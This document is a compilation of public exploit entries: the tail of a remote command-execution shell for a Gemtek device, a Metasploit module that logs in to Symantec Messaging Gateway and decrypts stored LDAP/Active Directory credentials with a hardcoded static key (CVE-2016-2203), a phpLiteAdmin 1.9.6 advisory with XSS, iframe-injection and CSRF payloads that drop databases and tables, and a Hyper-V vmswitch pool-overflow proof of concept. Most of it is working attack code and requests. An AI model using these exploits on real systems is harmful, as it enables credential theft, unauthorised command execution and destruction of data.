if not check() :
	print "Host seems not vulnerable"
	sys.exit()


# Interactive loop: each line typed is sent as one command; "quit" exits.
while(1):
	cmd = raw_input("gemtekCMD> ")
	if cmd.strip() != "quit" :
		sendcmd(cmd)
	else :
		sys.exit()
	
            
# Exploit Title: Symantec Brightmail ldap credential Grabber 
# Date: 18/04/2016
# Exploit Author: Fakhir Karim Reda
# Vendor Homepage: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year&suid=20160418_00
# Version: 10.6.0-7 and earlier
# Tested on: Linux, Unox Windows 
# CVE : CVE-2016-2203


#Symantec Brightmail 10.6.0-7 and earlier save the AD password somewhere in the product. By having a read account on the gateway  we can recover the AD #ACOUNT/PASSWORD  

#indeed the html code contains the encrypted AD password.

#the encryption and decryption part is implemented in Java in the appliance, by reversing the code we get to know the encryption algorithm:

#public static String decrypt(String password)
#{
#byte clearText[];
#try{
#PBEKeySpec keySpec = new PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"{}`~!@#$%^&*()_+-=".toCharArray());
#SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
#SecretKey secretKey = keyFactory.generateSecret(keySpec);
#System.out.println("Encoded key "+ (new String(secretKey.getEncoded())));


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require "base64"
require 'digest'
require "openssl"


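class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Symantec Messaging Gateway 10 LDAP Creds Graber',
      'Description'    => %q{
          This module will  grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key.  Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. Version 10.6.0-7 and earlier are affected

      },
      'References'     =>
        [
          ['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
          ['CVE','2016-2203'],
          ['BID','86137']
        ],

      'Author'         =>
        [
          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>'
        ],
       'DefaultOptions' =>
        {
          'SSL' => true,
          'SSLVersion' => 'TLS1',
          'RPORT' => 443
        },
       'License'        => MSF_LICENSE,
       'DisclosureDate' => "Dec 17 2015"
    ))
    register_options(
      [
        # NOTE(review): a 1 second connect/read timeout is short for a TLS
        # handshake over a slow link and may report reachable hosts as closed.
        OptInt.new('TIMEOUT', [true, 'HTTPS connect/read timeout in seconds', 1]),
        Opt::RPORT(443),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with'])
      ], self.class)
    deregister_options('RHOST')
  end


  # Output helpers: every line is prefixed with the peer so that scanner
  # output from several hosts can be told apart.  Callers must therefore
  # pass the bare message; adding "#{peer} - " themselves doubles the prefix.
  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_good(msg='')
    super("#{peer} - #{msg}")
  end

  def print_error(msg='')
    super("#{peer} - #{msg}")
  end

  # Stores the recovered directory credential in the database.
  #
  # The service recorded is the LDAP server named on the settings page
  # (opts[:ip] / opts[:port]), not the gateway that was scanned.
  # NOTE(review): opts[:port] is the string scraped from the HTML form;
  # confirm the credential model accepts it without an explicit to_i.
  def report_cred(opts)
   service_data = {
    address: opts[:ip],
    port: opts[:port],
    service_name: 'LDAP',
    protocol: 'tcp',
    workspace_id: myworkspace_id
   }
   credential_data = {
    origin_type: :service,
    module_fullname: fullname,
    username: opts[:user],
    private_data: opts[:password],
    private_type: :password
   }.merge(service_data)
   login_data = {
    last_attempted_at: DateTime.now,
    core: create_credential(credential_data),
    status: Metasploit::Model::Login::Status::SUCCESSFUL,
    proof: opts[:proof]
   }.merge(service_data)

   create_credential_login(login_data)
  end

  # Logs in to the web console and returns the post-login JSESSIONID
  # ('' when the server set no cookie), or false when no logged-in
  # session could be established.
  #
  # @param sid        [String] pre-login JSESSIONID from get_login_data
  # @param last_login [String] hidden "lastlogin" form value from the login page
  #
  # A successful login is recognised either directly in the response body or,
  # when the appliance answers with a redirect, in the body of the redirected
  # page.  A nil response is treated as failure instead of being dereferenced.
  def auth(username, password, sid, last_login)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => '/brightmail/login.do',
      'headers'   => {
        'Referer' => "https://#{peer}/brightmail/viewLogin.do",
        'Connection' => 'keep-alive'
      },
      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
      'vars_post' => {
        'lastlogin'  => last_login,
        'userLocale' => '',
        'lang'       => 'en_US',
        'username'   => username,
        'password'   => password,
        'loginBtn'   => 'Login'
      }
    })
    return false unless res

    if res.body =~ /Logged in/
      return res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
    end

    if res.headers['Location']
      # Only http://<ip>:<port>/... redirects are understood here.
      new_uri = res.headers['Location'].scan(/^http:\/\/[\d\.]+:\d+(\/.+)/).flatten[0]
      return false unless new_uri
      res = send_request_cgi({
        'uri'    => new_uri,
        'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}"
      })
      if res and res.body =~ /Logged in/
        return res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
      end
    end
    false
  end

  # Fetches the login page and returns [sid, last_login]: the pre-login
  # JSESSIONID cookie and the hidden "lastlogin" form field.  Either is ''
  # when it could not be found; auth needs both.
  def get_login_data
    sid        = ''
    last_login = ''
    res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'})
    if res
      unless res.get_cookies.empty?
        sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
      end
      last_login = res.body.scan(/<input type="hidden" name="lastlogin" value="(.+)"\/>/).flatten[0] || ''
    end
    return sid, last_login
  end

  # Returns the status of the listening port.
  #
  # @return [Boolean] TrueClass if port open, otherwise FalseClass.
  def port_open?
    begin
      res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT'])
      return true if res
    rescue ::Rex::ConnectionRefused
      print_status('Connection refused')
      return false
    rescue ::Rex::ConnectionError
      print_error('Connection failed')
      return false
    rescue ::OpenSSL::SSL::SSLError
      print_error('SSL/TLS connection error')
      return false
    end
  end

  # PKCS#5 v1.5 (PBES1) key derivation as used by PBEWithMD5AndDES: the
  # password and salt are concatenated and MD5 is applied `count` times.
  # The 16-byte digest is split into the 8-byte DES key and the 8-byte IV.
  #
  # @return [Array<String>] [key, iv]
  def get_derived_key(password, salt, count)
    key = password + salt
    count.times { key = Digest::MD5.digest(key) }
    return key[0, 8], key[8, 8]
  end


  # Deciphers a password value scraped from the LDAP settings page.
  # Algorithm obtained by reversing the firmware.
  #
  # The value is Base64: the first 12 characters carry the salt, the rest is
  # the DES-CBC ciphertext.  The DES key and IV are derived from the product's
  # static PBE passphrase below with 1000 MD5 iterations (PBEWithMD5AndDES).
  # OpenSSL padding handling is disabled and the PKCS#5 padding is checked
  # and removed explicitly, so a malformed final block does not raise.
  #
  # @return [String] the plaintext password
  def decrypt(enc_str)
    pbe_key="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-="
    salt  = Base64.strict_decode64(enc_str[0, 12])
    remsg = Base64.strict_decode64(enc_str[12, enc_str.length])
    dk, iv = get_derived_key(pbe_key, salt, 1000)
    decode_cipher = OpenSSL::Cipher.new('des-cbc')
    decode_cipher.decrypt
    decode_cipher.padding = 0
    decode_cipher.key = dk
    decode_cipher.iv = iv
    plain = decode_cipher.update(remsg)
    plain << decode_cipher.final
    strip_pkcs5_padding(plain)
  end

  # Removes well-formed PKCS#5 block padding (last byte n in 1..8 and the
  # final n bytes all equal n).  Anything else is returned unchanged rather
  # than stripping bytes from the middle of the plaintext, which the former
  # gsub(/[\x01-\x08]/, '') did.
  def strip_pkcs5_padding(data)
    return data if data.empty?
    pad = data[-1].ord
    return data unless pad.between?(1, 8) && data.length >= pad
    return data unless data[-pad..-1] == data[-1] * pad
    data[0...-pad]
  end

  # Walks the LDAP settings wizard with the authenticated session and
  # recovers the stored directory credential.
  #
  # 1. GET the wizard page for the CSRF token and the id of the selected
  #    LDAP source.
  # 2. POST to the edit action and read the Location header to obtain the
  #    flowId and the folder of the edit page.
  # 3. GET the edit page and scrape user name, encrypted password, host and
  #    port from its form fields.
  #
  # `last_login` is accepted for symmetry with auth but is not used here.
  # Returns false as soon as a step does not yield what the next one needs.
  def grab_auths(sid, last_login)
    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => "/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
      'headers'   => {
        'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
        'Connection' => 'keep-alive'
      },
      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid};"
    })
    return false unless res
    token = res.body.scan(/<input type="hidden" name="symantec.brightmail.key.TOKEN" value="(.+)"\/>/).flatten[0] || ''
    selected_ldap = res.body.scan(/<input type="checkbox" value="(.+)" name="selectedLDAP".+\/>/).flatten[0] || ''

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => "/brightmail/setting/ldap/LdapWizardFlow$edit.flo",
      'headers'   => {
        'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
        'Connection' => 'keep-alive'
      },
      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
      'vars_post'  => {
        'flowId'  => '0',
        'userLocale' => '',
        'lang'       => 'en_US',
        'symantec.brightmail.key.TOKEN'=> token,
        'selectedLDAP' => selected_ldap
      }
    })
    return false unless res and res.headers['Location']
    # Only https://<ip>/... redirects match; a hostname leaves new_uri nil,
    # which is reported as failure instead of raising on the scan below.
    new_uri = res.headers['Location'].scan(/^https:\/\/[\d\.]+(\/.+)/).flatten[0]
    return false unless new_uri
    flow_id = new_uri.scan(/.*\?flowId=(.+)/).flatten[0]
    folder  = new_uri.scan(/(.*)\?flowId=.*/).flatten[0]
    return false unless flow_id and folder

    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => folder,
      'headers'   => {
        'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
        'Connection' => 'keep-alive'
      },
      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
      'vars_get'  => {
        'flowId'  => flow_id,
        'userLocale' => '',
        'lang'       => 'en_US'
      }
    })
    unless res and res.code == 200
      print_error('Unable to retrieve the LDAP source settings page')
      return false
    end
    login    = res.body.scan(/<input type="text" name="userName".*value="(.+)"\/>/).flatten[0] || ''
    password = res.body.scan(/<input type="password" name="password".*value="(.+)"\/>/).flatten[0] || ''
    host     = res.body.scan(/<input name="host" id="host" type="text" value="(.+)" class/).flatten[0] || ''
    port     = res.body.scan(/<input name="port" id="port" type="text" value="(.+)" class/).flatten[0] || ''
    # An empty field cannot be Base64-decoded; leave it empty instead of raising.
    password = decrypt(password) unless password.empty?
    print_good("Found login = '#{login}' password = '#{password}' host ='#{host}' port = '#{port}' ")
    report_cred(ip: host, port: port, user:login, password: password, proof: res.code.to_s)
    true
  end

  # Scanner entry point: reachability check, pre-login data, login, then
  # credential recovery.  The original had the final `end` of the login
  # branch split into `e   nd`, which made the module fail to load.
  def run_host(ip)
    return unless port_open?
    sid, last_login = get_login_data
    if sid.empty? or last_login.empty?
      print_error('Missing required login data.  Cannot continue.')
      return
    end
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    sid = auth(username, password, sid, last_login)
    unless sid
      print_error('Unable to login.  Cannot continue.')
      return
    end
    print_good("Logged in as '#{username}:#{password}' Sid: '#{sid}' LastLogin '#{last_login}'")
    grab_auths(sid, last_login)
  end
end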
            
#################################################################################################################################################
# Exploit Title: phpLiteAdmin v1.9.6 - Multiple Vulnerabilities
# Date: 20.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.phpliteadmin.org
# Software Link: https://bitbucket.org/phpliteadmin/public/downloads/phpLiteAdmin_v1-9-6.zip
# Version: 1.9.6
#################################################################################

Introduction
phpLiteAdmin is a web-based SQLite database admin tool written in PHP with
support for SQLite3 and SQLite2. source = https://www.phpliteadmin.org


Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS


XSS details:
#################################################################################

XSS1

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1

METHOD
Post

PARAMETER
0_defaultoption

PAYLOAD
"><script>alert(1)</script>

Request
POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1

tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined"><script>alert(1)</script>&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test

#################################################################################

XSS2

URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import

METHOD
Post

PARAMETER
file

PAYLOAD
"><script>alert(2)</script>

Request
POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1

Content-Type: multipart/form-data;
boundary=---------------------------1675024292505
Content-Length: 1124

-----------------------------1675024292505
Content-Disposition: form-data; name="import_type"

sql
-----------------------------1675024292505
Content-Disposition: form-data; name="single_table"

testtable
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsterminated"

;
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsenclosed"

"
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsescaped"

\
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_replacenull"

NULL
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldnames"

on
-----------------------------1675024292505
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: text/plain

"><script>alert(2)</script>
-----------------------------1675024292505
Content-Disposition: form-data; name="import"

Import
-----------------------------1675024292505--


#################################################################################

XSS3

URL
http://localhost/phpliteadmin/phpliteadmin.php?view=sql

METHOD
Post

PARAMETER
queryval

PAYLOAD
"><script>alert(3)</script>

Request
POST /phpliteadmin/phpliteadmin.php?view=sql HTTP/1.1

queryval=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&delimiter=%3B&query=Go

#################################################################################

XSS4

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1

METHOD
Post

PARAMETER
select

PAYLOAD
"><script>alert(4)</script>

Request
POST /phpliteadmin/phpliteadmin.php?action=view_create&confirm=1 HTTP/1.1

viewname=test&select="><script>alert(4)</script>&createtable=Go

#################################################################################

XSS5

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1

METHOD
Post

PARAMETER
viewname

PAYLOAD
<script>alert(5)</script>

Request
POST /phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1 HTTP/1.1

viewname=test<script>alert(5)</script>


#################################################################################

XSS6

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable

METHOD
Post

PARAMETER
numRows

PAYLOAD
'><script>alert(6)</script>

Request
POST /phpliteadmin/phpliteadmin.php?action=row_view&table=testtable HTTP/1.1

show=Show+%3A+&numRows=30%27%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&startRow=0&viewtype=table

#################################################################################

XSS7

URL
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Cscript%3Ealert%287%29%3C/script%3E&pk=id

METHOD
Get

PARAMETER
action2

PAYLOAD
'><script>alert(7)</script>

#################################################################################

XSS8

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1

METHOD
Post

PARAMETER
tablename

PAYLOAD
%3cscript%3ealert(8)%3c%2fscript%3e

Request
POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1

tablename=testtable%3cscript%3ealert(8)%3c%2fscript%3e&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test

#################################################################################

XSS9

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1

METHOD
Post

PARAMETER
oldname

PAYLOAD
<script>alert(9)</script>

Request
POST /phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1 HTTP/1.1

oldname=testtable<script>alert(9)</script>&newname=test&rename=Rename

#################################################################################


HTML Injection details:
#################################################################################

HTML Injection1

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
METHOD
Post

PARAMETER
0_defaultoption

PAYLOAD
"><iframe src=https://www.phpliteadmin.org>

#################################################################################

HTML Injection2

URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import

METHOD
Post

PARAMETER
file

PAYLOAD
"><iframe src=https://www.phpliteadmin.org>

#################################################################################

HTML Injection3

URL
http://localhost/phpliteadmin/phpliteadmin.php?view=sql

METHOD
Post

PARAMETER
queryval

PAYLOAD
"><iframe src=https://www.phpliteadmin.org>

#################################################################################

HTML Injection4

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1

METHOD
Post

PARAMETER
select

PAYLOAD
"><iframe src=https://www.phpliteadmin.org>

#################################################################################

HTML Injection5

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1

METHOD
Post

PARAMETER
viewname

PAYLOAD
<iframe src=https://www.phpliteadmin.org>

#################################################################################

HTML Injection6

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable

METHOD
Post

PARAMETER
numRows

PAYLOAD
'><iframe src=https://www.phpliteadmin.org>


#################################################################################

HTML Injection7

URL
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Ciframe%20src=https://www.phpliteadmin.org%3E&pk=id

METHOD
Get

PARAMETER
action2

PAYLOAD
'><iframe src=https://www.phpliteadmin.org>

#################################################################################

HTML Injection8

URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1

METHOD
Post

PARAMETER
oldname

PAYLOAD
<iframe src=https://www.phpliteadmin.org>

#################################################################################


CSRF details:

#################################################################################

CSRF1

Create Database

<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="POST">
<input type="text" name="new_dbname" value="db"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>

#################################################################################

CSRF2

Drop Database

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?database_delete=1"
method="POST">
<input type="text" name="database_delete" value=".\db"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>

#################################################################################

CSRF3

Execute SQL

<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=sql"
method="POST">
<input type="text" name="queryval" value="test"/>
<input type="text" name="delimiter" value=";"/>
<input type="text" name="query" value="go"/>
<input type="submit" value="Execute SQL"/>
</form>
</body>
</html>

#################################################################################

CSRF4

Export DB

<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=export"
method="POST">
<input type="text" name="tables[]" value="testtable"/>
<input type="text" name="export_type" value="sql"/>
<input type="text" name="structure" value="on"/>
<input type="text" name="data" value="on"/>
<input type="text" name="transaction" value="on"/>
<input type="text" name="comments" value="on"/>
<input type="text" name="export_csv_fieldsterminated" value=";"/>
<input type="text" name="export_csv_fieldsenclosed" value="""/>
<input type="text" name="export_csv_fieldsescaped" value="\"/>
<input type="text" name="export_csv_replacenull" value="NULL"/>
<input type="text" name="export_csv_fieldnames" value="on"/>
<input type="text" name="filename" value="db_2016-04-20.dump"/>
<input type="text" name="export" value="Export"/>
<input type="submit" value="Export DB"/>
</form>
</body>
</html>

#################################################################################

CSRF5

Download Database

<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="GET">
<input type="text" name="download" value=".\db"/>
<input type="submit" value="Download DB"/>
</form>
</body>
</html>

#################################################################################

CSRF6

Import Table

URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import

Request
POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1

Content-Type: multipart/form-data;
boundary=---------------------------28282942824983
Content-Length: 1410

-----------------------------28282942824983
Content-Disposition: form-data; name="import_type"

sql
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsterminated"

;
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsenclosed"

"
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsescaped"

\
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_replacenull"

NULL
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldnames"

on
-----------------------------28282942824983
Content-Disposition: form-data; name="file";
filename="db_2016-04-20.dump.sql"
Content-Type: text/sql

----
-- phpLiteAdmin database dump (https://bitbucket.org/phpliteadmin/public)
-- phpLiteAdmin version: 1.9.6
-- Exported: 12:50am on April 20, 2016 (BST)
-- database file: .\db
----
BEGIN TRANSACTION;

----
-- Table structure for testtable
----
CREATE TABLE 'testtable' ('id' INTEGER DEFAULT 1 );

----
-- Data dump for testtable, a total of 1 rows
----
INSERT INTO "testtable" ("id") VALUES ('1');
COMMIT;

-----------------------------28282942824983
Content-Disposition: form-data; name="import"

Import
-----------------------------28282942824983--

#################################################################################

CSRF7

Database Vacuum

<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=vacuum"
method="POST">
<input type="text" name="vacuum" value="Vacuum"/>
<input type="submit" value="DB Vacuum"/>
</form>
</body>
</html>

#################################################################################

CSRF8

Database Rename

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?view=rename&database_rename=1"
method="POST">
<input type="text" name="oldname" value=".\db1"/>
<input type="text" name="newname" value=".\db"/>
<input type="text" name="rename" value="Rename"/>
<input type="submit" value="DB Rename"/>
</form>
</body>
</html>

#################################################################################

CSRF9

Create Table

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="text" name="rows" value="1"/>
<input type="text" name="0_field" value="id"/>
<input type="text" name="0_type" value="INTEGER"/>
<input type="text" name="0_defaultoption" value="defined"/>
<input type="text" name="0_defaultvalue" value="1"/>
<input type="submit" value="Create Table"/>
</form>
</body>
</html>

#################################################################################

CSRF10

Insert Table

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=row_create&confirm=1"


method="POST">
<input type="text" name="numRows" value="1"/>
<input type="text" name="function_0_id" value=""/>
<input type="text" name="0:id" value="1"/>
<input type="text" name="fields" value="id"/>
<input type="submit" value="Insert Table"/>
</form>
</body>
</html>

#################################################################################

CSRF11

Row Delete

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=row_delete&confirm=1&pk=%5B

%22%5B1%5D%22%5D" method="POST">
<input type="submit" value="Row Delete"/>
</form>
</body>
</html>

#################################################################################

CSRF12

Search Field

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=table_search&done=1"


method="POST">
<input type="text" name="id:operator" value="="/>
<input type="text" name="id" value="1"/>
<input type="submit" value="Search Field"/>
</form>
</body>
</html>

#################################################################################

CSRF13

Rename Table

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1"
method="POST">
<input type="text" name="oldname" value="test"/>
<input type="text" name="newname" value="testtable"/>
<input type="text" name="rename" value="Rename"/>
<input type="submit" value="Rename Table"/>
</form>
</body>
</html>

#################################################################################

CSRF14

Empty Table

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_empty&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="submit" value="Empty Table"/>
</form>
</body>
</html>

#################################################################################

CSRF15

Drop Table

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_drop&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="submit" value="Drop Table"/>
</form>
</body>
</html>

#################################################################################

CSRF16

Create View

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1"
method="POST">
<input type="text" name="viewname" value="test"/>
<input type="text" name="select" value="select * from testtable;"/>
<input type="text" name="createtable" value="go"/>
<input type="submit" value="Create View"/>
</form>
</body>
</html>

#################################################################################

CSRF17

Drop View

<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1"
method="POST">
<input type="text" name="viewname" value="test"/>
<input type="submit" value="Drop View"/>
</form>
</body>
</html>

#################################################################################

CSRF18

Logout

<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="POST">
<input type="hidden" name="logout" value="Logout"/>
<input type="submit" value="Logout"/>
</form>
</body>
</html>

#################################################################################
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=688

This function is reachable by sending a RNDIS Set request with OID 0x01010209 (OID_802_3_MULTICAST_LIST) from the Guest to the Host.

This function potentially allocates a buffer based on the addresses sent.
The number of entries is determined by dividing the length of the data by 6:

.text:000000000001D717 mov eax, 0AAAAAAABh
.text:000000000001D71C mov r13b, 1
.text:000000000001D71F mul r14d
.text:000000000001D722 mov ebp, edx
.text:000000000001D724 shr ebp, 2
.text:000000000001D727 test ebp, ebp ; ebp=r14d//6
.text:000000000001D729 jz loc_31B04
.text:000000000001D72F
.text:000000000001D72F loc_1D72F: ; CODE XREF: VmsMpCommonPvtHandleMulticastOids+144CEj
.text:000000000001D72F cmp ebp, [rbx+0EE8h]
.text:000000000001D735 jz loc_31B2B
.text:000000000001D73B mov r8d, 'mcMV' ; Tag
.text:000000000001D741 mov rdx, r14 ; NumberOfBytes
.text:000000000001D744 mov ecx, 200h ; PoolType
.text:000000000001D749 mov r12, r14
.text:000000000001D74C call cs:__imp_ExAllocatePoolWithTag
.text:000000000001D752 mov r14, rax
.text:000000000001D755 test rax, rax
.text:000000000001D758 jz loc_1D7E8
.text:000000000001D75E mov r8, r12 ; Size
.text:000000000001D761 mov rdx, r15 ; Src
.text:000000000001D764 mov rcx, rax ; Dst
.text:000000000001D767 call memmove

An interesting test is located at 0x1D72F.
If the number of entries is identical to the currently stored one, then we jump to this piece of code:

.text:0000000000031B2B loc_31B2B: ; CODE XREF: VmsMpCommonPvtHandleMulticastOids+F5j
.text:0000000000031B2B mov rcx, [rbx+0EE0h] ; Dst
.text:0000000000031B32 mov r8, r14 ; Size
.text:0000000000031B35 mov rdx, r15 ; Src
.text:0000000000031B38 call memmove

Note that the size of the copy operation is the size of the data. As the division is dropping the remainder component, we can overflow the allocation by 1 to 5 bytes doing the following:
- call this function with data of size 6*x
- call this function again with size 6*x+y with 1<=y<=5
  - then 6*x bytes will be allocated and stored at 0xee0
  - and x will be saved at 0xee8;
  - x will be compared with what is at 0xee8
  - being equal it will proceed copying 6*x+y in a buffer of 6*x bytes at 0xee0

If exploited successfully (not sure if it's doable), it would lead to code execution in the context of the Host R0.

Please note that this issue has been silently fixed in Windows Server 2016 TP4 (and maybe prior).

PoC (put it and call it somewhere useful in rndis_filter.c):
*/

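/*
 * Send one OID_802_3_MULTICAST_LIST SET request whose information buffer is
 * info_len bytes long and wait for the host's completion.
 *
 * rdev:     the RNDIS device to send on
 * info_len: length of the multicast list in bytes (only the length matters
 *           for the overflow; the contents are whatever get_rndis_request()
 *           leaves in the buffer)
 *
 * Returns 0 when the host reports RNDIS_STATUS_SUCCESS, -ENOMEM if no request
 * could be obtained, -ETIMEDOUT if the host did not answer within 5 s, -EINVAL
 * if the host rejected the SET, or the error from rndis_filter_send_request().
 * The request is always released before returning (the original returned
 * straight out of the timeout path and leaked it).
 */
static int rndis_send_multicast_set(struct rndis_device *rdev, u32 info_len)
{
  int ret;
  struct rndis_request *request;
  struct rndis_set_request *set;
  struct rndis_set_complete *set_complete;
  unsigned long t;

  request = get_rndis_request(
    rdev, RNDIS_MSG_SET,
    RNDIS_MESSAGE_SIZE(struct rndis_set_request) + info_len);
  if (!request)
    return -ENOMEM;

  set = &request->request_msg.msg.set_req;
  set->oid = 0x01010209; // OID_802_3_MULTICAST_LIST
  set->info_buflen = info_len;
  set->info_buf_offset = sizeof(struct rndis_set_request);
  set->dev_vc_handle = 0;

  ret = rndis_filter_send_request(rdev, request);
  if (ret != 0)
    goto cleanup;

  t = wait_for_completion_timeout(&request->wait_event, 5*HZ);
  if (t == 0) {
    ret = -ETIMEDOUT;
    goto cleanup;
  }

  set_complete = &request->response_msg.msg.set_complete;
  if (set_complete->status != RNDIS_STATUS_SUCCESS) {
    printk(KERN_INFO "failed to set multicast list: 0x%x\n",
      set_complete->status);
    ret = -EINVAL;
  }

cleanup:
  put_rndis_request(rdev, request);

  return ret;
}

/*
 * Trigger the vmswitch.sys pool overflow described above.
 *
 * First SET: 16 entries * 6 bytes, so the host allocates a 96-byte pool
 * buffer and records 16 as the entry count. Second SET: 101 bytes, which the
 * host's len/6 also turns into 16 entries, so it reuses the 96-byte buffer
 * and memmove()s all 101 bytes into it (a 5-byte overflow).
 *
 * Returns 0 if both requests were accepted, otherwise the error of the first
 * request that failed. The second request is not sent when the first fails:
 * the overflow depends on the host having stored the first list, so going on
 * would only produce a misleading result.
 */
static int rndis_pool_overflow(struct rndis_device *rdev)
{
  u32 extlen = 16 * 6;
  int ret;

  ret = rndis_send_multicast_set(rdev, extlen);
  if (ret != 0)
    return ret;

  return rndis_send_multicast_set(rdev, extlen + 5);
}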

/*
Crash dump (with Special Pool enabled for vmswitch.sys):

